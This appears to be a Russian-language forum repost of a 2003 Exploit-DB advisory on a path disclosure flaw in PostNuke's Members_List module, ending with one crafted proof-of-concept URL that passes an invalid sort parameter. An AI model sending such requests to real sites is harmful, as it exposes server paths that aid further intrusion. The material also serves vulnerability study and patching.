Exploit PostNuke 0.72x Members_List Module - Full Path Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22439
Проверка EDB
  1. Пройдено
Автор
RKC
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2003-03-28
Код:
source: https://www.securityfocus.com/bid/7218/info
 
Multiple path disclosure vulnerabilities have been reported in various PHP scripts used by PHP-Nuke. The issue occurs when an invalid URI parameter is passed to certain scripts. The affected scripts do not provide sufficient error handling for this circumstance and as such, may display an error page containing sensitive information path information. 

http://www.target.com/modules.php?op=modload&name=Members_List&file=index&letter=All&sortby=uname1234
 
Источник
www.exploit-db.com

Похожие темы